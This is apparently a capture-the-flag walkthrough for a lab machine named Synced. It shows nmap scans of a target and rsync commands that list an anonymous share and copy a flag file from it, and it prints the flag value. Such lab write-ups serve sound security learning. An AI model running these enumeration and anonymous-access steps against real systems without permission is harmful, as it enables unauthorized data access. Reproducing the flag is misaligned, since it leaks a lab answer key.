08.SYNCED (RSYNC)
Rsync, Protocols, Reconnaissance, Anonymous/Guest Access
root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn
root@htb:~$ nmap -sV -T4 {targetIP} -p-
PORT STATE SERVICE VERSION
873/tcp open rsync (protocol version 31)
root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 873
PORT STATE SERVICE VERSION
873/tcp open rsync (protocol version 31)
* the -sC option runs Nmap's default set of NSE scripts, which typically include
scripts for service enumeration, version detection, and other basic checks.
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 873
PORT STATE SERVICE
873/tcp open rsync
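* the --script=vuln option runs the NSE scripts in the vuln category, which focus on detecting known
vulnerabilities in the service running on port 873
- e.g., known vulnerabilities or weak configurations in the rsync service
- if no results are found, the service may be fully patched, but an empty result only means none of these scripts matched; it does not flag misconfigurations such as the anonymous share listed below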
root@htb:~$ which rsync
/usr/bin/rsync
root@htb:~$ rsync --help
* syntax: rsync [OPTION] … [USER@]HOST::SRC [DEST]
#LISTINGS & COPYING METHOD
root@htb:~$ rsync --list-only 10.129.228.37::
public Anonymous Share
* lists the modules (shares) that the server makes available to an anonymous user
root@htb:~$ rsync --list-only 10.129.228.37::public
drwxr-xr-x 4,096 2022/10/24 17:02:23 .
-rw-r--r-- 33 2022/10/24 16:32:03 flag.txt
root@htb:~$ rsync 10.129.228.37::public/flag.txt flag.txt
root@htb:~$ cat flag.txt
72eaf5344ebb84908ae543a719830519
#ALTERNATIVE
root@htb:~$ rsync rsync://10.129.228.37
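* this cmd connects to the server without credentials (anonymously) and, as no module is named, lists the available modules, like `rsync --list-only 10.129.228.37::` above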
root@htb:~$ rsync -av --list-only rsync://10.129.228.37/public
drwxr-xr-x 4,096 2022/10/24 17:02:23 .
-rw-r--r-- 33 2022/10/24 16:32:03 flag.txt
* -a means archive mode (recursive, and preserves permissions, timestamps, etc.)
* -v means verbose
root@htb:~$ rsync -av rsync://10.129.228.37/public/flag.txt /home/str1f3/Downloads/
receiving incremental file list
flag.txt
root@htb:~$ cat flag.txt
* 72eaf5344ebb84908ae543a719830519